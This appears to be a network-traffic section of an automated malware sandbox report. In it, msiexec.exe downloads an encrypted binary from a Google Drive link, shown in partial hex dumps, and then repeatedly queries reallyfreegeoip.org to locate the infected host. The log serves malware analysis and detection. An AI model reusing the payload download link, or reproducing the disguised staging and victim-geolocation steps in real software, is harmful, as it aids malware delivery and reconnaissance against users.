https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49806	172.217.17.65	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:29 UTC	258	OUT	GET /download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-19 07:19:32 UTC	4943	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC57gQNerBz1OtbMJt2hfPFsMNgoUhgzP7BW6E7FbnDUUZ_YUUI_8cE3BS3qbkHWJsc3BGMBEkg Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="UUguINmnKbCga77.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Wed, 18 Dec 2024 11:05:08 GMT Date: Thu, 19 Dec 2024 07:19:32 GMT Expires: Thu, 19 Dec 2024 07:19:32 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=FnoReQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-19 07:19:32 UTC	4943	IN	Data Raw: be a1 67 78 ab f1 7c 66 2a 24 09 91 8f f3 88 e4 83 9f 82 ba 60 05 4a 9f 1a 5f 82 2a fc fe df 80 2b c8 df 8b 3c 84 71 5a 72 e1 ee 78 05 5e 55 f8 63 66 0d d7 09 ff b8 2f 53 54 6a 67 92 f5 75 35 47 78 58 4a e2 4f 2c b0 18 89 a5 6c 3c 20 d6 83 44 9b 81 45 33 76 13 26 4e ff 83 d8 08 06 6e 3b 7d 2b a4 a8 29 22 ab 8b 90 2e 9d 11 03 73 5e 68 3a a9 e7 73 1b 6f 94 40 fc 33 d2 25 9f d6 7e 27 91 56 58 7e 7b c3 80 76 3a ae 67 4c 79 6c 01 d3 46 90 25 09 c6 4d ea 32 de 83 37 ab c6 8d 8b 39 cb 0d 90 03 12 5e d6 ec 21 f3 4b 7b 99 1b 87 79 9e 3f 57 7d ef fb 45 f0 e8 02 33 6b 56 15 49 e5 04 ef 68 7e 16 4f 4e c7 d4 08 68 27 ca aa c3 29 f1 4a a2 51 a9 d9 00 f2 5c 4c 9b 9a 8b 08 71 02 88 c8 90 10 f7 0a 30 6e 10 d2 5d d7 2d 38 87 38 e9 b6 4e d9 f9 e0 8d 30 16 7c e4 a1 07 67 62 Data Ascii: gx\|f$`J_+<qZrx^Ucf/STjgu5GxXJO,l< DE3v&Nn;}+)".s^h:so@3%~'VX~{v:gLylF%M279^!K{y?W}E3kVIh~ONh')JQ\Lq0n]-88N0\|gb
2024-12-19 07:19:33 UTC	4808	IN	Data Raw: 26 9b c8 34 2e 26 6a 31 3d aa 6b 83 c8 18 79 2f b3 49 b4 92 b6 e3 84 a1 a5 f1 ef 44 e1 ca e5 32 59 4e fa ee ac a5 56 47 40 ab 0d 7f 0a 2c c8 4a e1 4f 2c b0 1c 89 a5 6c c3 de d6 83 fc 4c 80 45 33 ae 12 26 0e ef 83 d8 08 43 6e 3b 7c 30 94 ab 29 93 ab 8b 90 3d 9d 11 12 73 5e 40 59 a9 e7 79 10 68 bc 1a fc 33 d8 26 70 8a 7e 27 95 26 86 70 7b 7d 89 bc 04 06 eb 5f b4 4d 54 d4 4a e3 05 73 b4 25 8a 2f d9 ee 17 c2 a0 8c 82 56 bf 27 9d 0e 32 2c a9 8e 01 e9 4c 5b dd 5e c7 5d f3 41 37 10 d6 85 22 fa cc 08 20 6e 56 04 4c 96 3f aa 68 74 49 48 5c c1 0f e2 94 41 ca a0 c3 f7 ff 4a b3 57 65 d1 13 f5 38 4c cb 9a 81 2c a9 13 8c b3 fd 10 f7 00 3d b0 20 91 48 d2 01 10 96 3d 86 d7 4a d9 f3 e0 11 ee 18 5c f5 a5 2b 6d 73 31 d4 f3 21 50 68 79 d9 92 94 52 57 0c 38 c3 34 c2 15 d4 70 Data Ascii: &4.&j1=ky/ID2YNVG@,JO,lLE3&Cn;\|0)=s^@Yyh3&p~'&p{}_MTJs%/V'2,L[^]A7" nVL?htIH\AJWe8L,= H=J\+ms1!PhyRW84p
2024-12-19 07:19:33 UTC	1326	IN	Data Raw: 55 8c 6d 05 c9 d6 45 81 dc 5f f7 99 83 32 25 cc 6b 55 68 2a 5e 87 16 eb c8 0c 77 69 5e c2 83 8f 0c a3 9f 55 5c 11 98 66 dd 88 55 b9 b6 aa c9 a7 9a 1e 5f 40 17 3f f3 79 16 21 57 9d e3 50 65 7f 95 5f 0c 2e 7b 3b 28 54 27 62 12 1d e4 35 13 ad 18 61 e9 4d aa 6c b2 0b 1a c3 62 a7 9e 6c 7e 7b 12 66 f8 41 88 e5 fe cc 7e 3d 3a da 1b 3f da bf 0e 57 73 2c c9 8c 25 26 5a 50 31 3d f4 18 40 c8 2f 72 40 77 d8 b5 98 b6 fc 8c ce 60 f1 ef 4e 9f f5 e5 32 5d 8c 3d ee ac b4 56 56 48 11 95 6f 0a 52 e0 fe e1 4f 26 c2 b3 99 a5 1c eb 84 d6 83 f6 f4 46 45 33 7c 13 37 06 e2 0e 98 08 06 6f 1e 6b 59 e9 a7 29 52 09 ae 87 06 29 11 03 79 fc 4d 22 db 80 7c 1b 1f 36 65 e5 4d ea 25 1f d2 dc 02 85 3b 69 7f 7b 07 2b 9e 00 68 4c 00 b4 49 f7 9e 33 91 9c 76 b4 52 2f 68 ca ee 17 c2 c8 2b e5 56 Data Ascii: UmE_2%kUh*^wi^U\fU_@?y!WPe_.{;(T'b5aMlbl~{fA~=:?Ws,%&ZP1=@/r@w`N2]=VVHoRO&FE3\|7okY)R)yM"\|6eM%;i{+hLI3vR/h+V
2024-12-19 07:19:33 UTC	1390	IN	Data Raw: 78 71 3d ee 5f 0a cc 04 62 d7 cd ec f4 d0 5a 3e 12 68 7f 39 b4 3e 23 55 6d 1f c4 d1 50 9f e8 79 3e b0 67 e3 d4 33 79 de 28 af bc 1d af c2 90 02 be 74 91 d4 f9 d4 59 b0 c5 d2 69 34 46 55 fc 95 ec 62 c2 01 35 6e 37 14 d3 b9 d3 97 e6 01 58 f5 6e e1 a9 fc 8d d7 d6 8a 25 69 b3 4c fe 51 aa 6c a5 ed 04 ae cd ef f2 c7 11 26 d8 22 7a 0f 99 cd 07 9b c2 aa 62 b1 a4 9c af 14 7b ab 39 53 fd 2e 85 ba c5 d4 1d 26 f6 41 59 38 24 07 73 e1 48 68 42 6e 63 74 cd d7 21 ef 34 1e 78 53 81 59 e9 50 78 69 c0 50 14 54 12 48 d6 a6 ea 15 64 34 22 45 57 ff 24 2c ac dc 1f 4e 28 d6 c6 20 29 b8 94 5a e1 d9 ef a9 c7 8a 2b 3a 8e 5f 24 db c6 e4 3a 1c 33 3b 66 aa c4 76 70 6a 9c 16 31 9a f3 29 fc ca 79 73 fa 54 66 9a c8 ff d7 db 14 82 9c 20 58 be 81 27 75 00 18 1f 5f 06 78 bf 13 4a f0 be c9 Data Ascii: xq=_bZ>h9>#UmPy>g3y(tYi4FUb5n7Xn%iLQl&"zb{9S.&AY8$sHhBnct!4xSYPxiPTHd4"EW$,N( )Z+:_$:3;fvpj1)ysTf X'u_xJ
2024-12-19 07:19:33 UTC	1390	IN	Data Raw: 6e 0f 56 80 42 99 53 5b 9b da 60 11 ca 8e 23 8e 1c b3 51 67 f0 b9 a0 5c da f7 34 09 2a 81 33 28 57 aa 83 a7 f4 2d fd cc 9c ff c9 22 59 9e f2 00 af 43 9b 74 b2 20 71 b6 ba b1 a0 3c d7 bf 08 14 89 43 4e e8 25 2c fb 95 5e 96 35 ac f0 8b 39 bf 80 49 16 a7 2c 3e 15 b0 7b 08 ab 35 ec 63 d0 45 92 a3 69 bd cb ec 49 4a 66 f2 ea 44 23 a3 ce 3b 2c 6d 0f fc b8 63 ae cb 46 4b b4 57 f4 27 6c 1e 2f 0f 35 df 3d ca fd b1 1f 99 15 98 89 32 3b 0f 1e 8e 66 82 b0 bd c2 08 dd 2d bb 4a ae d4 bd c4 31 0d ea 43 a4 54 1e 82 c3 95 82 a6 38 ed dc dd d8 a5 f4 14 7b 3e 76 07 86 65 cf 88 9f 28 b2 12 d6 f1 33 62 9f 46 3b 22 cc 58 04 a9 02 b5 7c 01 e9 06 40 dd 13 13 fe 59 2f 0e ea 00 e2 5e bd 90 f0 63 04 9b 6a bb 60 cd b3 9f bc 89 02 bb 81 d0 c9 40 30 38 8e 94 8d 33 e5 3a a9 07 54 1d ff Data Ascii: nVBS[`#Qg\4*3(W-"YCt q<CN%,^59I,>{5cEiIJfD#;,mcFKW'l/5=2;f-J1CT8{>ve(3bF;"X\|@Y/^cj`@083:T
2024-12-19 07:19:33 UTC	1390	IN	Data Raw: 98 66 93 2d 14 89 fc f1 e6 2c 48 5b ab 4b 48 a4 9d 03 4d ae 84 3d a3 91 d4 38 24 da d7 8f ba 33 b7 8f 98 c3 18 f8 07 34 f0 a1 88 f1 73 df bc c4 ce e5 b8 d4 f7 25 66 1d 6a ce 59 b8 74 97 65 af 13 be 40 dc bc 14 8c 1e 38 0c c8 96 78 40 d7 f3 26 7f 6e c4 19 41 9a fa 66 b3 1e f9 12 66 c0 35 c3 14 57 ad 94 d6 8e 39 f0 44 1f fb fb 1f 80 c9 0d 43 69 12 3a fe 55 90 73 44 06 19 4e 36 d7 eb 49 0b 95 25 4b 24 81 59 1f d0 e3 42 33 78 06 29 f4 04 48 9f b0 2f c2 01 13 3c c9 14 01 97 bc c8 b5 84 86 bc ff 57 dd ef fe 7d ae 07 e9 ab 35 d1 da 22 5e c7 e8 95 38 8f e7 81 93 cf e3 f7 08 ea bb 1a 81 7c 79 9b ea 9c c8 f0 d8 41 b8 25 bf a6 66 24 55 83 f4 88 9c 40 a2 12 ef 7e 22 32 c3 d8 17 bc ea 8f 61 07 f0 53 66 45 8f 8d 2f 8c e3 a4 34 c5 27 40 55 c9 34 97 2d 16 70 80 05 f4 af Data Ascii: f-,H[KHM=8$34s%fjYte@8x@&nAff5W9DCi:UsDN6I%K$YB3x)H/<W}5"^8\|yA%f$U@~"2aSfE/4'@U4-p
2024-12-19 07:19:33 UTC	1390	IN	Data Raw: 08 1f 7f ba b2 2d a5 dc c5 65 05 a1 06 79 fd 3a 6a f3 f3 8b 7d 23 83 cb 3a bb e5 e3 00 a9 45 dc da 35 37 d9 88 85 71 9f 84 43 96 08 dc 45 9b 23 99 fd cd a0 c3 3f fb 51 44 fc 9d b8 b9 bc cf 67 09 81 34 5f 1d b4 e1 8e db cb 48 49 2a 57 53 dd 08 c9 51 e6 28 dd 28 7f 70 1a 92 02 d7 c8 a8 ea 0b d2 b5 99 de 08 ad eb 44 c3 4f b8 89 95 76 b3 40 95 e0 15 59 12 2c d3 20 d4 b6 92 c3 6d 7e 88 3e ad 36 6b f4 b4 42 f1 70 42 3a 71 94 09 04 c6 d5 00 8d c5 c2 30 7c b1 7b 89 c6 ed c3 cb b0 a8 ec 9d e2 f5 b0 dd d6 0f 5f 70 90 f8 a7 f1 9a 38 20 5f 16 30 92 ab 0f 11 3e ef 86 6f 1b 0b aa d6 0e 92 21 df 6d df f0 33 7a cf 77 b0 1d ea 27 72 e3 12 d7 5f d7 2a b7 4e 99 29 d9 13 f8 54 41 a1 75 35 11 bd 68 79 f7 e2 f1 e3 2c ad e2 47 89 1c e1 b3 69 2e c0 1b fa e7 76 12 8a 9c 12 2c 34 Data Ascii: -ey:j}#:E57qCE#?QDg4_HIWSQ((pDOv@Y, m~>6kBpB:q0\|{_p8 _0>o!m3zw'r_N)TAu5hy,Gi.v,4
2024-12-19 07:19:33 UTC	1390	IN	Data Raw: 06 ff 84 59 01 70 91 59 dd 2d 11 e8 92 e9 d6 40 d9 27 ec cd 39 3a 5b ed ce 06 65 62 3f bb 2e ff 43 47 51 31 9b bc 36 44 08 32 e1 88 ce 15 d9 81 bd e4 87 2e 7b 01 a0 59 1f 0d 3d ea 66 e3 cb f9 2c 5c e0 04 f0 ca 66 fe aa 47 2d c1 02 4d 84 a8 ce 09 f8 9d ec bf 7c 6f 9e 8c 99 31 88 a6 0c 9a 89 10 79 aa c1 65 66 53 f6 0e 33 e8 21 c9 44 6e ee cb 7f 24 44 30 91 92 cb 70 44 16 cb 23 73 70 d4 a8 90 6e 39 01 ff b5 ba 65 3a 07 5e 44 bb 3f 58 c0 b0 68 d8 a3 1b dd 5c d0 0f 73 8c 99 a8 e8 39 30 c7 b1 68 0f 52 02 de fe 64 76 0d 35 40 f8 be a8 9d 2b ee 31 06 90 7d 32 97 01 47 17 b9 75 14 61 44 49 e7 35 20 c0 ff f7 16 b4 4d a8 4d 52 fd 5f 9f 4f 1a fc 13 a7 96 f7 83 ab d1 7f 71 55 d9 45 ab e1 6d ac 80 d3 0d d2 17 ce 3c aa 3a 0c 61 3a a5 b7 fc e6 cd 3f ab 49 20 65 25 6e a0 Data Ascii: YpY-@'9:[eb?.CGQ16D2.{Y=f,\fG-M\|o1yefS3!Dn$D0pD#spn9e:^D?Xh\s90hRdv5@+1}2GuaDI5 MMR_OqUEm<:a:?I e%n
2024-12-19 07:19:33 UTC	1390	IN	Data Raw: 5c 55 75 0b 35 15 97 36 be 70 a7 e8 5e a9 df 90 28 58 f3 61 a7 ee da a5 66 51 46 f8 47 ff 87 db d0 06 52 ed da 6b 97 f2 b9 cc 57 79 49 86 84 34 24 37 48 2a b0 b0 6b 83 c9 0a 6e 5d ea cf b5 e2 14 c8 93 89 11 f1 ef 4e 43 ed fd 40 3e ec fb 9e 0e 9b 4f 39 78 63 0c 7b a8 07 d2 38 d0 4c 2c c0 be a1 d0 6c c3 d5 c5 a0 ea b3 f7 45 33 7c 13 06 0e f3 83 d8 20 71 6e 3b 77 2b a4 d6 16 22 ab 8f 81 0c ef 68 14 73 2e 16 25 a9 e7 77 33 26 94 40 f6 22 f1 5b 5f d6 7e 23 b7 77 e2 70 7d 77 57 ab 3e 3e 52 00 b4 47 46 9f 2f cb 67 79 b4 28 53 40 bf ee 17 b6 90 e3 e5 52 cd b8 f0 66 42 3a 8b 03 01 9a 2f 4d 23 55 c7 7c e2 75 1f 44 dc 7b 08 fa cc 03 16 7d 24 2e 5f e5 24 08 4d 69 72 fa 4d c7 07 2f dd 59 b8 cd cc 29 81 e8 87 48 37 e1 02 f3 53 ef ee 80 f9 1d 76 02 f8 7e b5 0b 89 2a 30 Data Ascii: \Uu56p^(XafQFGRkWyI4$7Hkn]NC@>O9xc{8L,lE3\| qn;w+"hs.%w3&@"[_~#wp}wW>>RGF/gy(S@RfB:/M#U\|uD{}$._$MirM/Y)H7Sv~0
2024-12-19 07:19:33 UTC	1390	IN	Data Raw: 7a 3d 46 15 0d 60 c7 2c d5 36 6e 13 68 e5 76 21 e3 3e 08 ae 25 92 4b f2 42 54 1b ee 41 03 3f c9 69 a4 8d f9 15 3f 41 3d 54 46 ed 63 af ac dc 1f 5f 0a b9 97 5e 17 bc bc 60 c9 12 e9 a9 13 f5 c2 12 ba 55 24 c0 c4 b9 00 34 51 3f 18 9b 1a 76 74 19 20 68 06 90 9c e0 8e 5f 71 73 9b 53 5f 17 a7 31 dd cd e0 83 9e 08 26 55 ad 7b 62 8d 86 0f 7a 2f 69 a9 61 0d ec ad b9 d9 6e f6 4e 39 16 e4 1d 8c 2f 59 26 39 2a 95 e8 40 8e ab 25 3e 0f 0a cd 4a 85 0d db 26 0a e6 ac 17 84 4e 0d 65 37 55 bb c9 7f 87 e2 bf 8c 1d 2d 8e ea e3 db bf 7b 32 03 30 04 6e cc 5b 02 40 0c bf de 4b 81 ac f7 d2 5c 23 19 00 e4 5b f7 4d 3a 3f b3 15 c3 da ae 52 78 fd bc 85 8f 08 01 ba 49 50 64 8e 66 a9 58 e8 ce b6 da d5 9c 0e 60 69 4a 01 c5 80 5b 01 30 21 b2 08 d3 65 7f e1 66 f2 2f 6c 5f 4a 52 1e c4 04 Data Ascii: z=F`,6nhv!>%KBTA?i?A=TFc_^`U$4Q?vt h_qsS_1&U{bz/ianN9/Y&9*@%>J&Ne7U-{20n[@K\#[M:?RxIPdfX`iJ[0!ef/l_JR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49825	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-19 07:19:37 UTC	880	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581546 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=No3j0qXYXdII1Lx7D8llIm14l5J%2FXNP8%2Fztj8LqyHpKxlXStvvpsh%2Brm8TA8c3X5b6Zv%2FfYSXerWvG2A9KT4DOc9zfzNTqG%2FmHoxaO3TWlbSJTM3cLTRCj7E2UUTIByZvPyNqfDt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a01c9bf67283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1875&min_rtt=1867&rtt_var=718&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1506707&cwnd=244&unsent_bytes=0&cid=6795cd7fd8ed15c1&ts=482&x=0"
2024-12-19 07:19:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49831	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:39 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 07:19:40 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581548 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSQLzADwoYG%2FzfYLddO%2FQCDiTji5M5WVbeZDJyughjMRzttgGH4VL4DKcTYYQIOkTXPMJMAfGVglWLj4vPe4bvRpN9UNvAt88czZw6Oyccm%2Fy2htrBxCVSpX49xymzeBUFsQ4jU7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a02ace4fc407-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1481&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1913499&cwnd=197&unsent_bytes=0&cid=26f552744cd99ece&ts=448&x=0"
2024-12-19 07:19:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49843	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 07:19:43 UTC	882	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581551 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbDCF2T4eY2tVt4iq3dNONT6QdUvMi2JvrICJCY2QJ4VIsxfbtZiyl7uk4D0f1Dyi101TC%2B9jL57nFFYLRFe2i5951%2F1Fypt4BqUX8VCUhPUUsSBAHj%2ByXmKnHAI%2Fh6d%2Fpflo%2FB9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a03ccff6440b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1822721&cwnd=227&unsent_bytes=0&cid=2c83656431f6850f&ts=448&x=0"
2024-12-19 07:19:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49850	172.67.177.134	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:45 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 07:19:45 UTC	880	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 581554 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OuWKX8ppP9sjpg1%2F4b0oVwhpAUDFxtrMLNOG4k974WTY8D33ucZACKGVyMgFvasT4srvW9srUyFq0EeM0m2j8xBmWynG%2Fdjo%2FMJ9waLkw1RcpWsu5W7JuMtlFyZgkBt7Ma%2Bmc2%2Bm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f45a04edb71c484-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1520&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1898569&cwnd=248&unsent_bytes=0&cid=9a03c7d8d0413bb7&ts=452&x=0"
